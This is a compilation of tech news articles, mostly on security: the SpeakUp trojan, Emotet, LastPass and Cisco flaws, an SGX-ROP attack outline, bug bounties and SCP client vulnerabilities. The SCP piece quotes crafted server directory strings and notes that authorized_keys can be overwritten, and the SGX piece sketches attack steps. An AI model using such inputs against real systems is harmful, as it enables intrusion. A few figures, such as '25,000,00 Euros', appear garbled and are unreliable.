Tech News - Malware Analysis

Security Researchers have discovered a new backdoor trojan, dubbed as ‘SpeakUp’ which exploits known vulnerabilities in six different Linux distributions and has the ability to infect MacOS. This trojan discovered by Check Point Research, is being utilised in a crypto mining campaign that has targeted more than 70,000 servers worldwide so far. Attackers have been using SpeakUp in a campaign to deploy Monero cryptocurrency miners on infected servers thus earning around 107 Monero coins (around $4,500). Last month, the backdoor was spotted for the first time and researchers discovered a built-in Python script that allowed the trojan to spread through the local network, laterally. The virus remains undetected, has complex propagation tactics, and the threat surface contains servers that run the top sites on the internet. What can this trojan do? Vulnerable systems that have been affected by this trojan allow the hackers to perform a host of  illicit activities like modification of the local cron utility to gain boot persistence, take control over shell commands, execute files downloaded from a remote command and control (C&C) server, and update or uninstall itself. According to the researchers, SpeakUp has already been spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. The hackers behind SpeakUp are using an exploit for the ThinkPHP framework to infect servers and the researchers have not  seen the attackers targeting anything except ThinkPHP. The trojan has been crafted with complexity and can scan local networks for open ports, use a list of pre-defined usernames and passwords to brute-force nearby systems and take over unpatched systems using one of these seven exploits: CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities CVE-2010-1871: JBoss Seam Framework remote code execution JBoss AS 3/4/5/6: Remote Command Execution CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware. Hadoop YARN ResourceManager - Command Execution CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability. Security researchers have also pointed out to the fact that the SpeakUp’s authors have the ability to download any code they want to the servers. “SpeakUp’s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making. It is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.” According to Threatpost, Oded Vanunu, head of products vulnerability research for Check Point, said that “the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. Since these software can be deployed on virtual servers, all cloud infrastructure are also prone to be affected.” According to the analysis by Check Point Research, the malware is currently distributed to Linux servers mainly located in China. Lotem Finkelstein, one of the Check Point researchers told ZDNet that “the infections in non-Chinese countries comes from SpeakUp using its second-stage exploits to infect companies' internal networks, which resulted in the trojan spreading outside the normal geographical area of a Chinese-only PHP framework.” You can head over to Check Point Research official post for a break down of how this trojan works as well as an analysis of its impact. Git-bug: A new distributed bug tracker embedded in git Fortnite just fixed a bug that let attackers to fully access user accounts, impersonate real players and buy V-Buck 35-year-old vulnerabilities in SCP client discovered by F-Secure researcher

Intel recently announced their fix for Spectre variant 4 attack that would significantly decrease CPU performance. While working on this fix, Intel anticipated some performance questions that were around the combined software and firmware microcode updates that helps mitigate Spectre variant 4. As discovered by Jann Horn of Google Project Zero and Ken Johnson of Microsoft Spectre variant 4 is a speculative store bypass. Speculative bypass is a variant 4 vulnerability, with this an attacker can leverage variant 4 to read older memory values in a CPU’s stack or other memory locations. This vulnerability allows less privileged code to read arbitrary privileged data and run older commands speculatively. Intel call its mitigation of this Spectre attack as Speculative Store Bypass Disable (SSBD). Intel delivers this as a microcode update to appliance manufacturers, operating system vendors and other ecosystem partners. According to Intel, this patch will be ‘off” by default but if enabled Intel has observed an impact on the the performance from 2%-8% approximately but this would all depend on the overall scores from benchmarks such as SPECint, SYSmark® 2014 SE, and more. Back in January, Intel was less forthcoming in communicating about the CPU performance impact caused by Spectre variant 2 mitigation. They just waved-off such concerns with claiming that the performance would vary depending on the workload. However, Google pushed back stating the impact was severe and ended-up developing its very own Retpoline software alternative. Recently, Intel tested the impact of SSBD running it on an unspecified Intel reference hardware and 8th Gen Intel Core desktop microprocessor. The results on the performance impact of the overall score are as follows: SYSmark 2014 SE: 4% SPECint_rate_base2006 (n copy): 2% SPECint_rate_base2006 (1 copy): 8% These benchmark results are similar even on a Skylake architecture Xeon processor. Intel has clearly stated that this mitigation will be set to ‘off’ by default giving customers a choice to enable it. This is because Intel speculates that most industry software partners will go with the default option to avoid overall performance degradation. They also noted that SSBD would add an extra layer of protection to the hardware of consumers and original equipment manufacturers to prevent the Speculative Store Bypass from occurring. They also stated that the existing browser mitigations against Spectre variant 1 will help to an extend in mitigating variant 4. You can know more about the latest security updates on Intel products form Intel security center. Top 5 penetration testing tools for ethical hackers 12 common malware types you should know Pentest tool in focus: Metasploit  

Last week, the team behind LastPass, a password manager website, released an update to patch a security vulnerability that exposes credentials entered by the users on a previously visited site. This vulnerability would let the websites steal credentials for the last account the user had logged into via Chrome or Opera extension. Tavis Ormandy, a security researcher at Google’s Project Zero discovered this bug last month. The security vulnerability appeared on extensions from pop-up windows Google Project Zero’s issue page, Ormandy explained that the flaw rooted from the extensions generated on the popup windows. In some cases, websites could produce a popup by creating an HTML iframe that was linked to the Lastpass popupfilltab.html window instead of calling the do_popupregister() function. In some of the cases, this unexpected method led the popups to open with a password for the most recently visited site.  https://twitter.com/taviso/status/1173401754257375232 According to Ormandy, an attacker can easily hide a malicious link behind a Google Translate URL and make users visit the link, and then extract credentials from a previously visited site. Google’s Project Zero reporting site reads, "Because do_popupregister() is never called, ftd_get_frameparenturl() just uses the last cached value in g_popup_url_by_tabid for the current tab. That means via some clickjacking, you can leak the credentials for the previous site logged in for the current tab." LastPass patched the reported issue in version 4.33.0 that was released on 12th September. According to the official blog post, the bug impacts its Chrome and Opera browser extensions. The bug is considered dangerous as it relies on executing malicious JavaScript code alone without the need for user interaction. Ormandy further added, “I think it’s fair to call this “High” severity, even if it won’t work for *all* URLs.” Ferenc Kun, the security engineering manager for LastPass said in an online statement that this "limited set of circumstances on specific browser extensions" could potentially enable the attack scenario described. Kun further added, "To exploit this bug, a series of actions would need to be taken by a LastPass user including filling a password with the LastPass icon, then visiting a compromised or malicious site and finally being tricked into clicking on the page several times."  LastPass recommends general security practices The team at LastPass shared the following list of general security practices:  Users need to beware of phishing attacks, they shouldn’t click on links from untrusted contacts and companies.  The team advises the users to enable MFA for LastPass and other services like including email, bank, Twitter, Facebook, etc. Additional layers of authentication could prove to be the most effective way to protect the account.  Users shouldn’t reuse or disclose the LastPass master password. Users should use unique passwords for every online account and run antivirus with the latest detection patterns and keeping their software up-to-date.  To know more about this news, check out the official post. Other interesting news in security UK’s NCSC report reveals significant ransomware, phishing, and supply chain threats to businesses A new Stuxnet-level vulnerability named Simjacker used to secretly spy over mobile phones in multiple countries for over 2 years: Adaptive Mobile Security reports Lilocked ransomware (Lilu) affects thousands of Linux-based servers          

Earlier this month, Cisco announced a critical vulnerability in its Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch Software. This vulnerability allows an unauthenticated, remote attacker to connect to the affected system with the privileges of the root user. This vulnerability is only exploitable over IPv6; however, the IPv4 is not vulnerable. Cisco has released free software updates that address the vulnerability. This vulnerability(CVE-2019-1804), with a CVSS severity rating of 9.8, is due to the presence of a default SSH key pair that is present in all devices. An attacker could exploit this vulnerability by opening an SSH connection via IPv6 to a targeted device using the extracted key materials. There are no workarounds, so Cisco is encouraging users to update to the latest software release. However, the fix is only an interim patch. The company also issued a “high” security warning advisory for the Nexus 9000, with a CVSS severity rating of 10.0. This involves an exploit that allows attackers to execute arbitrary operating-system commands as root on an affected device. In order to succeed, an attacker would need valid administrator credentials for the device, Cisco said. The vulnerability is due to overly broad system-file permissions where an attacker could exploit this vulnerability by authenticating to an affected device, creating a crafted command string and writing this crafted string to a specific file location. Critical vulnerabilities Cisco’s web-based management interface Multiple critical vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager were revealed yesterday. These vulnerabilities could allow a remote attacker to gain the ability to execute arbitrary code with elevated privileges on the underlying operating system. These vulnerabilities affect Cisco PI Software Releases prior to 3.4.1, 3.5, and 3.6, and EPN Manager Releases prior to 3.0.1 One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker that has network access to the affected administrative interface. For the second and third issues(CVE-2019-1822 and CVE-2019-1823), the attacker needs to have valid credentials to authenticate to the impacted administrative interface. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. To know more about these and other vulnerabilities, visit Cisco’s Security Advisories and Alerts page. Cisco merely blacklisted a curl instead of actually fixing the vulnerable code for RV320 and RV325 Cisco announces severe vulnerability that gives improper access controls for URLs in its Small Business routers RV320 and RV325 A WhatsApp vulnerability enabled attackers to inject Israeli spyware on user’s phones

E-mail is the traditional, primary, and the most vital part of communication within business organizations. They hold minutes of important discussions, confidential documents as attachments, high-profile business contact details, and much more. Hence, hackers or intruders often use emails as a medium to deliver dangerous content to the victim via attachments or by providing links to malicious websites. Companies throughout the world take huge efforts to detect malicious content within their communication media by setting up robust antivirus firewalls. But, how secure are they? Many choose antivirus engines based on their popularity than its performance. The myth that famous antivirus packages get you utmost security is now debunked by Email-sec-360°. According to Phys Org, it surpasses 60 other popular antivirus packages known to us. Email-sec-360° is developed by Aviad Cohen, a Ph.D. student, and researcher at the Ben-Gurion University of the Negev (BGU) Malware Lab researchers. It detects unknown, malicious emails much more accurately than the popular antivirus products such as Kaspersky, McAfee, Avast, etc. Email-sec-360° vs other popular antivirus engines Present antivirus engines use rule-based methods to analyze specific email sections. These often overlook the other important parts of the email. Dr. Nir Nissim, head of the David and Janet Polak Family Malware Lab at Cyber@BGU, stated that the existing antivirus engines use signature-based detection methods. These methods are at times insufficient for detecting new and unknown malicious emails. However, Email-sec-360° is based on machine learning methods and leverages 100 general descriptive features extracted from all email components, which include the header, body and attachments. Also an interesting fact about this method is that, it does not require an internet access. Thus, it provides a seamless threat detection in real-time and can be easily deployed by any individual or organizations. A well-experimented approach by the Malware Lab The researchers used a collection of 33,142 emails, which included 12,835 malicious and 20,307 benign emails obtained between 2013 and 2016. Later, they compared their detection model to 60 industry-leading antivirus engines as well as previous research. On doing this, they found their system to outperform the next best antivirus engine, Cyren, by a 13 percent range. BGU’s Malware Lab method vs the others BGU Malware Lab plan to extend this method by including research and analysis of attachments (PDFs and Microsoft Office documents) within the Email-sec-360°. Dr. Nissim adds,”since these are often used by hackers to get users to open and propagate viruses and malware.” They are also planning to develop an online system that evaluates the security risk posed by an email message. This system will be based on advanced machine learning methods and would also allow users to submit suspicious email messages and quickly obtain a maliciousness score. The system will further recommend on how to treat the email and would help to collect benign and malicious emails for research purposes. Read more about Email-sec-360° in the Phys Org blog post Pentest tool in focus: Metasploit 12 common malware types you should know 4 Ways You Can Use Machine Learning for Enterprise Security

Yesterday, Google Calendar was down for nearly three hours around the world. Calendar users that were trying to access the service faced a 404 error message through their browsers from around 10 AM ET to 12:40 PM ET. Google updated the service details stating, “We're investigating reports of an issue with Google Calendar. We will provide more information shortly. The affected users are unable to access Google Calendar.” During this outage, Google services including Gmail and Google Maps appeared to be unaffected but Hangouts Meet reportedly experienced some issues. Meanwhile, when Calendar was down, a lot of them expressed their concerns via tweets. Here are a few of the reactions: https://twitter.com/BestGaryEver/status/1141004879382700040   https://twitter.com/falcons3040/status/1141143090239090689 https://twitter.com/ola11king/status/1141012717144199169 https://twitter.com/thejacegoodwin/status/1140999161434689541 https://twitter.com/ChristinaAllDay/status/1140986268878286848 Few others were irritated, a user commented on HackerNews, “I guess it's time for all the Google engineers to put their LeetCode skills to the test.” People were also expecting the response to be quicker from the company.  Another comment reads, “Over an hour into the outage, still no word at all from Google on the status page apart from -We're investigating.” Such outages have been happening every now and then; earlier this month, Google Cloud suffered a major outage that took down a number of Google services including YouTube, GSuite, Gmail, etc. This outage had also affected the services that were dependent on Google including Nest, Discord, Snapchat, Shopify and more. To know more about this news, check out the Service details by Google. How Genius used embedded hidden Morse code in lyrics to catch plagiarism in Google search results Google announces early access of ‘Game Builder’, a platform for building 3D games with zero coding Google, Facebook and Twitter submit reports to EU Commission on progress to fight disinformation

Google made its scalable fuzzing tool, called ClusterFuzz available as open source, yesterday. ClusterFuzz is used by Google for fuzzing the Chrome Browser, a technique that helps detect bugs in software by feeding unexpected inputs to a target program. For fuzzing to be effective, it should be continuous, done at scale, and integrated into the development process of a software project. ClusterFuzz can run on clusters with over 25,000 machines and can effectively highlight security and stability issues in software. It serves as the fuzzing backend for OSS-Fuzz, a service that Google released back in 2016. ClusterFuzz was earlier offered as free service to open source projects through OSS-Fuzz but is now available for anyone to use. ClusterFuzz comes with a variety of features that help integrate fuzzing into a software project's development process. Here are some of the key features in ClusterFuzz: Helps with accurate deduplication of crashes. Comes with a fully automatic bug filing and closing for issue trackers. Includes statistics for analyzing fuzzer performance, and crash rates. Comprises easy-to-use web interface for management and viewing crashes. ClusterFuzz has so far tracked more than 16,000 bugs in Chrome and over 11,000 bugs in more than 160 open source projects integrated with OSS-Fuzz. ClusterFuzz can detect bugs hours after they have been introduced and is capable of verifying the fix within a day. “We developed ClusterFuzz over eight years to fit seamlessly into developer workflows, and to make it dead simple to find bugs and get them fixed. Through open sourcing ClusterFuzz, we hope to encourage all software developers to integrate fuzzing into their workflows.”, states the ClusterFuzz team members. For more information, check out the ClusterFuzz’s official GitHub repository. Google expands its Blockchain search tools, adds six new cryptocurrencies in BigQuery Public Datasets Transformer-XL: A Google architecture with 80% longer dependency than RNNs Google News Initiative partners with Google AI to help ‘deep fake’ audio detection research

Three days ago, Emotet, a dangerous malware botnet was found sending malicious emails to many countries around the globe. The maligned email with Emotet's signature was first spotted on the morning of September 18th in countries like Germany, the United Kingdom, Poland, Italy, and the U.S.A. by targeting their individuals, businesses, and government entities. This is not Emotet’s first outing, as it has been found to be used as a banking trojan in 2014. https://twitter.com/MalwareTechBlog/status/1173517787597172741 If any receiver of the infected mail unknowingly downloaded and executed it, they may have exposed themselves to the Emotet malware. Once infected, the computer is then added to the Emotet botnet which uses the particular computer as a downloader for other threats. The Emotet botnet was able to compromise many websites like customernoble.com, taxolabs.com, www.mutlukadinlarakademisi.com, and more. In a statement to BleepingComputer, security researchers from email security corp Cofense Labs said, “Emotet is now targeting almost 66,000 unique emails for more than 30,000 domain names from 385 unique top-level domains (TLDs).” The origin of the malicious emails are suspected to be from “3,362 different senders, whose credentials had been stolen. The count for the total number of unique domains reached 1,875, covering a little over 400 TLDs.” Brad Duncan, a security researcher also reported that some U.S.-based hosts received Trickbot, which is a banking trojan turned malware dropper. Trickbot is a secondary malware infection dropped by Emotet. https://twitter.com/malware_traffic/status/1173694224572792834 What did Emotet botnet do in its last outing? According to BleepingComputer, the Command and control (C2) servers for the Emotet botnet had got active in the beginning of June 2019 but did not send out any instructions to infected machines, until August 22. Presumably, the bot was taking time to rebuild themselves, establish new distribution channels and preparing for new spam campaigns. In short, it was under maintenance. Benkøw, a security researcher had listed a list of stages required for the botnet to respawn a malicious activity. https://twitter.com/benkow_/status/1164899159431946240 Therefore, Emotet’s arrival was not a surprise to many security researchers, as it was expected that the Emotet botnet would revive sooner or later. How does the Emotet botnet function? Discovered in 2014, Emotet was originally designed as a banking trojan to target mostly German and Austrian bank customers by stealing their login credentials. However, over time it has evolved into a versatile and effective malware attack. Once a device is infected, the Emotet botnet tries to penetrate the associated systems via brute-force attacks. This enables Emotnet to perform DDoS attacks or to send out spam emails after obtaining a user’s financial data, browsing history, saved passwords, and Bitcoin wallets. On the other hand, the infected machine comes in contact with Emotet’s Command and Control (C&C) servers to receive updates. It also uses its C&C servers as a junkyard for storing the stolen data. Per Cyren, a single Emotet bot can send a few hundred thousand emails in just one hour, which means that it is capable of sending a few million emails in a day. Emotet delivers modules to extract passwords from local apps, which is then spread sideways to other computers on the same network. It is also capable of stealing the entire email thread to be later reused for spam campaigns. Emotet also provides Malware-as-a-Service (MaaS) to other malware groups to rent access to the Emotet-infected computers. Meanwhile, many people on Twitter are sharing details about Emotet for others to watch out. https://twitter.com/BenAylett/status/1174560327649746944 https://twitter.com/papa_anniekey/status/1173763993325826049 https://twitter.com/evanderburg/status/1174073569254395904 Interested readers can check out the Malware security analysis report for more information. Also, head over to BleepingComputer for more details. Latest news in Security LastPass patched a security vulnerability from the extensions generated on pop-up windows An unsecured Elasticsearch database exposes personal information of 20 million Ecuadoreans including 6.77M children under 18 UK’s NCSC report reveals significant ransomware, phishing, and supply chain threats to businesses

Malware or a malicious software is designed to harm user’s computer systems in multiple ways. Over the years, hackers and attackers have implemented various methods to inject viruses, worms, Trojans, and spyware to collapse a computer system. To combat against the current age malware, you must know how a malware function and what techniques attackers use to launch a malware within a system. Some advanced malware techniques include: Privilege Escalation is how a malware attempts to increase its reach within the system. Persistence Methods keep malware in execution state for a longer time. Data Encoding basically explores ways to hide the intent of the malware. Covert launching techniques help in launching malware in the most stealthy manner. Out of the three, privilege escalation is a network intrusion method where malware can enter the system via programming errors or design flaws. With the help of these channels, the attacker can have a direct access to the network and its associated data and applications. Watch the video below by Munir Njenga to know all about privilege escalation and its types in depth using real world examples. https://www.youtube.com/watch?v=Qzlkw5sJUsw About Munir Njengar Munir is a technology enthusiast, cybersecurity consultant, and researcher. His skills and competencies stem from his active involvement in engagements that deliver advisory services such as network security reviews, security course development, training and capacity building, mobile and internet banking security reviews (BSS, MSC, HLR/AUC, IN, NGN, GGSN/SGSN), web applications, and network attack and penetration testing. To know more about privilege Escalation and to learn other malware analysis methods, check out our course titled ‘Advanced Malware Analysis’ to which this video belongs.

Julia Reda, EU member of the parliament, announced, last week, that EU will be funding the internet bug bounty programs for 14 out of the total 15 open source projects, starting January 2019. The Internet Bug Bounty programs are rewards for friendly hackers who actively search for security vulnerabilities and issues. The program is managed by a group of volunteers that are selected from the security community. The amount of the bounty depends on how severe the issue uncovered is and the importance of the software. The amount ranges from 25,000,00 Euros and all the way up to 89,000,00 Euros. The 14 open source projects include: Filezilla Apache Kafka Notepad++ PuTTY VLC media player FLUX TL KeePass 7-zip Digital Signature services (DSS) Drupal GNU C library (glibc) The Symfony PHP framework Apache Tomcat WSO2 MidPoint. EU is sponsoring the bug bounty programs as a part of their third edition of the Free and Open Source Software Audit project (FOSSA). Reda mentions that FOSSA project that started in 2015, was an initiative to encourage promotion of free and open source software. “In 2014, security vulnerabilities were found in important Free Software projects. One of the issues was found in the Open Source encryption library OpenSSL.The issue made lots of people realize how important Free and Open Source Software is for the integrity and reliability of the Internet and other infrastructure”, mentions Reda. People can contribute to the projects mentioned by EU by analyzing the software, and submitting any bugs or issues found in these software on bug bounty platforms such as Hackerone and Intigriti/Deloitte. For more information, check out Julia Reda’s official blog post. Mozilla funds winners of the 2018 Creative Media Awards for highlighting unintended consequences of AI in society Airtable, a Slack-like coding platform for non-techies, raises $100 million in funding The ‘Flock’ program provides grants to Aragon teams worth $1 million

Researchers Michael Schwarz, Samuel Weiser, and Daniel Gruss from Graz University of Technology  have published a research paper that demonstrates how the Intel SGX currently poses as a security threat. The SGX (Software Guard eXtensions) allows malicious code to run on a system, which cannot be identified or analyzed by an antivirus software. SGX allows programs to establish protected enclaves for code and data, where none of the programs on the system can spy on it or tamper with it. The contents of an enclave are encrypted when written to RAM and decrypted upon being read. The processor does not allow code from outside the enclave to access the enclave’s memory. Researchers have used this model to understand what happens if the code inside the enclave itself is malicious. The SGX is designed in such a way that antimalware software will not be able to detect the malware, thus making these enclaves the perfect spot for planting malicious code. The researchers used an SGX-ROP attack that depicts the above, by including the the Transactional Synchronization eXtension(TSK)-based memory disclosure primitive as part of the process. The TSK was also a part of the Meltdown attacks launched on Intel processors. How does the attack take place? According to the researchers, since code in an enclave is quite restricted, it cannot make operating system calls, open files, read data from disk, or write to disk.  All of these attacks have to be performed from outside the enclave and only the encryption operation would occur within the enclave. That being said, the enclave code has the ability to read and write anywhere in the unencrypted process memory. To work with this model the TSX was used which provides a constrained form of transactional memory where a thread can modify different memory locations and then publish those modifications in one single atomic update. The enclave makes use of this functionality and scans the memory of the host process to find the components for its ROP payload and somewhere to write that payload. It  then redirects the processor to run that payload which can mark a section of memory as being executable, for the malware to put its own set of supporting functions someplace  it can access. What's more? The critical encryption will take place inside the enclave, making it impossible to extract the encryption key or even analyze the malware to find out what algorithm it's using to encrypt the data. Another thing to note is that malware isn't constrained by the enclave and it can subvert the host application to access operating system APIs, making way for attacks such as ransomware-style encryption of a victim's files. This is what an Intel spokesperson has replied to ZDNet in an email: “Intel is aware of this research which is based upon assumptions that are outside the threat model for Intel® SGX. The value of Intel SGX is to execute code in a protected enclave; however, Intel SGX does not guarantee that the code executed in the enclave is from a trusted source. In all cases, we recommend utilizing programs, files, apps, and plugins from trusted sources. Protecting customers continues to be a critical priority for us, and we would like to thank Michael Schwarz, Samuel Weiser, and Daniel Gruss for their ongoing research and for working with Intel on coordinated vulnerability disclosure”. The research paper outlines 4 simple steps required to perform the attack: The malicious enclave scans the host application for usable ROP gadgets using the read primitive The enclave identifies writable memory caves through the write primitive and injects the arbitrary malicious payload into those caves. The enclave uses the gadgets identified in step 1 to construct a ROP chain and injects it into the application stack. The enclave returns execution to the host application. Once the application hits the ROP chain on the stack, the actual exploitation starts. The ROP chain runs with host privileges and then the attacker can issue arbitrary system calls to hack into the system. You can head over to the Research paper to know more about the methodology followed by the researchers for this attack. Linux 4.20 kernel slower than its previous stable releases, Spectre flaw to be blamed, according to Phoronix Seven new Spectre and Meltdown attacks found Intel announces 9th Gen Core CPUs with Spectre and Meltdown Hardware Protection amongst other upgrades

Microsoft made a series of new announcements, earlier this week. These include a new Microsoft Defender ATP for Mac, a first fully automated DNA data storage system, and the Revived Microsoft Office Assistant, Clippy. Microsoft Defender ATP for Mac Microsoft team announced yesterday that it's expanding the reach of the core components of its security platforms (including the new Threat & Vulnerability Management) to Mac devices. Also, the name of these unified endpoint security platforms has been updated to Microsoft Defender ATP (Advanced Threat Protection) from the prior Windows Defender ATP, keeping in mind its new cross-platform nature. “We’ve been working closely with industry partners to enable Windows Defender Advanced Threat Protection (ATP) customers to protect their non-Windows devices while keeping a centralized “single pane of glass” experience”, states the Microsoft Team. Users can install the Microsoft Defender ATP client on devices running macOS Mojave, macOS High Sierra, or macOS Sierra to manage and protect these devices. This app offers next-gen anti-malware protection, allowing users to review and perform configuration of their protection. Users can also configure the advanced settings, including disabling or enabling real-time protection, cloud-delivered protection, and automatic sample submission among others. Moreover, devices with alerts and detections will also get surfaced in the Microsoft Defender ATP portal. Security analysts and admins can then further review these alerts on Mac devices. Other than that, the Microsoft team also plans to bring Microsoft Intune in the future. This would enable the users to configure and deploy the settings via alternative Mac and MDM management tools such as JAMF. Fully automated DNA data storage system Microsoft announced the new and first fully automated DNA data storage system, yesterday. The system allows with the storage and retrieval of data in manufactured DNA. This move is aimed at moving the DNA tech out of the research lab and into commercial data centers, says the Microsoft team. The team (Microsoft researchers and University of Washington) successfully encoded the word “hello” in snippets of fabricated DNA. They then further converted it back to digital data with the help of a fully automated end-to-end system. This automated DNA data storage system makes use of the software developed by the Microsoft and UW team that helps convert the ones and zeros of digital data into the As, Ts, Cs, and Gs (the building blocks of DNA). It then leverages the inexpensive, ‘off-the-shelf’  lab equipment to allow the flow of necessary liquids and chemicals into a synthesizer. This synthesizer then builds the manufactured snippets of DNA and pushes them into a storage vessel. In case the system wants to retrieve the information, it can add other chemicals to properly prepare the DNA and uses microfluidic pumps to push the liquids into other parts of the system. This system is then able to “read” the DNA sequences and convert them back to information understandable by a computer. According to the researchers, “the goal of the project was not to prove how fast or inexpensively the system could work, but simply to demonstrate that automation is possible” Revived Office Assistant Clippy Microsoft revived its 90s Microsoft Office Assistant, called Clippy, earlier this week on Tuesday. Microsoft Office team brought back Clippy as an app that can offer animated Clippy stickers on chats in Microsoft Teams, company’s group chat software.These Clippy stickers were also released on Microsoft’s official Office developer GitHub page, allowing all the Microsoft Teams users to import and use these stickers for free. However, Clippy was removed yet again the next day. This is because the “brand police” within Microsoft was not happy with the reappearance of Clippy on Microsoft Teams, reports The Verge. The GitHub project associated with the same has also been removed. Clippy fans, however, are not happy with the company’s decision and have started a thread requesting Microsoft to bring back Clippy in Microsoft Teams. Microsoft brings PostgreSQL extension and SQL Notebooks functionality to Azure Data Studio Microsoft open-sources Project Zipline, its data compression algorithm and hardware for the cloud Microsoft announces Game stack with Xbox Live integration to Android and iOS

Hyatt Hotels Corporation launched its bug bounty program with HackerOne, earlier this week. As part of the bug bounty program, ethical hackers are invited to test Hyatt websites and apps to spot potential vulnerabilities in them. “At Hyatt, protecting guest and customer information is our top priority and launching this program represents an important step that furthers our goal of keeping our guests safe every day,” stated Hyatt Chief Information Security Officer Benjamin Vaughn. Hyatt Hotels Corporation is headquartered in Chicago and is a leading global hospitality company comprising a portfolio of 14 premier brands. Hyatt’s portfolio includes more than 750 properties in more than 55 countries across six continents. Hyatt decided to choose HackerOne bug bounty program after conducting a deep review of the bug bounty marketplace. The Bug Bounty program by HackerOne rewards friendly hackers who help discover security vulnerabilities in various important software on the internet. Hyatt is the first in the hotel industry to launch bug bounty program. “By being the first organization in the hospitality industry to embrace the collaborative efforts of global security researchers, Hyatt hopes to continue to raise its already high level of security standards as well as learn from and collaborate with security researchers”, stated the Hyatt team. The bug bounty program launched by Hyatt with Hackerone was originally available as an invite-only private program where it paid the hackers about $5600 in bounties (bug bounty rewards). This has changed as the bug bounty program is now public. Hackers are allowed to search for vulnerabilities on hyatt.com domain, www.hyatt.com,  m.hyatt.com, world.hyatt.com, and on Hyatt’s mobile apps for iOS and Android. The company will be paying hackers $4000 for spotting critical vulnerabilities, and $300 for low severity issues. The company will be rewarding hackers for tracking vulnerabilities such as novel Origin IP address discovery, authentication bypass, back-end system access via front-end systems, business logic bypass, container escape, SQL Injection, cross-site request forgery, exploitable cross-site scripting, and WAF bypass, among other issues. “Bug bounty programs are a proven method for advancing an organization’s cybersecurity defenses. In today’s connected society, vulnerabilities will always be present. Organizations like Hyatt are leading the way by taking this essential step to secure the data they are trusted to hold”, said HackerOne CEO Marten Mickos. EU to sponsor bug bounty programs for 14 open source projects from January 2019 Airtable, a Slack-like coding platform for non-techies, raises $100 million in funding The ‘Flock’ program provides grants to Aragon teams worth $1 million

Yesterday, Harry Sintonen, researcher at F-Secure, discovered 35-year-old vulnerabilities associated with SCP (Secure Copy Protocol) client, a network protocol, that uses Secure Shell (SSH) for data transfer between hosts on a network. These SCP clients are susceptible to a malicious SCP server, which could perform unauthorized changes to the target directory. In 2000, a directory traversal bug was found in the SCP client in SSH, which got fixed then. Vulnerabilities discovered One of the vulnerabilities associated with SCP clients lets the attackers write arbitrary malicious files to the target directory on the client machine. The attackers can change the permissions on the directory to allow further compromises. Another vulnerability is that the SCP clients are failing to verify how valid is the object returned to it after a download request. The consequences are severe as an attacker who controls the server can easily drop arbitrary files into the directory from which the user runs SCP (similar to a man-in-the-middle attack). The list of major vulnerabilities discovered are: CWE-20: SCP client improper directory name validation [CVE-2018-20685] With the help of empty ("D0777 0 \n") or dot ("D0777 0 .\n") directory name, the SCP client permits the server to modify permissions of the target directory. CWE-20: SCP client missing received object name validation [CVE-2019-6111] Since the SCP implementation has been derived from 1983 rcp (1), the server can choose which files/directories are sent to the client. According to the post by Sintonen, “A malicious SCP server can overwrite arbitrary files in the SCP client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example overwrite .ssh/authorized_keys).” This vulnerability is known as CVE-2018-20684 in WinSCP. CWE-451: SCP client spoofing via object name [CVE-2019-6109] The object name can be used to manipulate the client output as there is a missing character encoding in the progress display. For example to employ ANSI codes to hide additional files being transferred. CWE-451: SCP client spoofing via stderr [CVE-2019-6110] A malicious server can manipulate the client output by accepting and displaying arbitrary stderr output from the SCP server. These vulnerabilities affect the SCP client implementations in Red Hat, Debian, and SUSE Linux, OpenSSH version 7.9 and earlier, and few versions of WinSCP. How to overcome these vulnerabilities? For OpenSSH Users can switch to sftp or apply the https://sintonen.fi/advisories/scp-name-validator.patch for hardening scp against server-side manipulation attempts. A note by Sintonen : This patch may cause problems if the the remote and local shells don't agree on the way glob() pattern matching works. YMMV. For WinSCP One can upgrade to WinSCP 5.14 or later versions. There are no fixes available for PuTTY yet and users are refraining from using PuTTY. One of the users commented on HackerNews, “I strongly discourage anyone from using PuTTY, not for this reason, but for its weird and nonstandard handling of SSH keys.” Users are now more skeptical to deal with the network while downloading their files and transferring them. Most of us highly rely on SSH as we think it is secure and trusted, but should we continue trusting it? Is it advisable to blindly trust and not take preventive measure beforehand? One of the users commented on HackerNews, “We trust a lot of things, and maybe we shouldn't. I use SCP infrequently and on machines that I control, so that's a level of risk I'm comfortable with.” Another user commented on the HackerNews thread, “The argument that you trusted this server enough to connect to it and download a file, therefore you clearly should trust it enough to permit it to execute arbitrary executables on your machine, is false in both cases.” Another user advises accessing data in offline mode by shutting down the instance and connecting the storage as secondary storage on another instance. The user further suggests discarding the storage as soon as the work is done. The data can also be downloaded at the hypervisor level. Another comment on HackerNews reads, “You can't physically access the disk, but you often can download a snapshot or disk image, which is created at the hypervisor level.” To know more about the vulnerabilities, check out the post by Sintonen advisories. OpenSSH, now a part of the Windows Server 2019 OpenSSH 7.9 released OpenSSH 7.8 released!

